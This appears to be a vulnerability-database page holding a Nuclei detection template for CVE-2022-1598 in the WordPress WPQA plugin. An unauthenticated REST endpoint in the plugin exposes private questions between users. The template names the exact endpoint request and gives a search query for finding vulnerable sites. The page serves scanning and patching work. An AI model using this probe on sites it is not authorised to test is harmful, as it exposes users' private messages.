Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1598
HistoryMay 17, 2022 - 8:26 a.m.

WordPress WPQA <5.5 - Improper Access Control

2022-05-1708:26:45
ProjectDiscovery
github.com
5
wordpress
wp-plugin
wpqa
improper access control
vulnerability
data breaches
cve2022
idor
wpscan
2code

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS

0.012

Percentile

85.0%

WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.
id: CVE-2022-1598

info:
  name: WordPress WPQA <5.5 - Improper Access Control
  author: veshraj
  severity: medium
  description: |
    WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.
  impact: |
    This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions.
  remediation: |
    Update the WPQA plugin to version 5.5 or later to fix the improper access control issue.
  reference:
    - https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1598
    - https://github.com/20142995/Goby
    - https://github.com/WhooAmii/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-1598
    cwe-id: CWE-306
    epss-score: 0.01171
    epss-percentile: 0.84938
    cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 2code
    product: wpqa_builder
    framework: wordpress
    google-query: inurl:/wp-content/plugins/wpqa
  tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan,2code

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-json/wp/v2/asked-question'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"rendered":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220278deeaf67083ccb68ce2205d04a0a4a02427300fc9c0a45283ab8dc73121916022100f7a05fe99792027369340fc3460571ce3e936119ee078b4848282260e1694657:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS

0.012

Percentile

85.0%

Related for NUCLEI:CVE-2022-1598